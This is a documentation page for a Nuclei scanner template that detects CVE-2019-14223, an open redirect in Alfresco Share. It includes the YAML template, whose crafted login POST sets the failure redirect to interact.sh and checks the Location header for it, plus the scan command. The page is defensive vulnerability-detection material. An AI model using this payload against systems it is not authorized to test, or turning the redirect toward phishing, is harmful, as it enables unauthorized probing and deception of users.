Skip to content
Nuclei Templates

Alfresco Share - Open Redirect

ID: CVE-2019-14223

Severity: medium

Author: pdteam

Tags: cve,cve2019,redirect,alfresco

Description

Section titled “Description”

Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2019-14223


info:
  name: Alfresco Share - Open Redirect
  author: pdteam
  severity: medium
  description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability.
  reference:
    - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
    - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14223
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14223
    cwe-id: CWE-601
    epss-score: 0.00205
    epss-percentile: 0.58403
    cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:*
  metadata:
    max-request: 1
    vendor: alfresco
    product: alfresco
  tags: cve,cve2019,redirect,alfresco


http:
  - method: POST
    path:
      - '{{BaseURL}}/share/page/dologin'


    body: |
      success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass


    headers:
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: regex
        part: header
        regex:
          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
# digest: 4a0a00473045022045f3157412634f64a3560cb5a501ea7b44900089895e849f9d45febae84db57a022100bf7a67d64bb90b6ac6355d7ccec37ad7c747171b14c5d90fb3168d7b22aba654:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-14223.yaml"

View on Github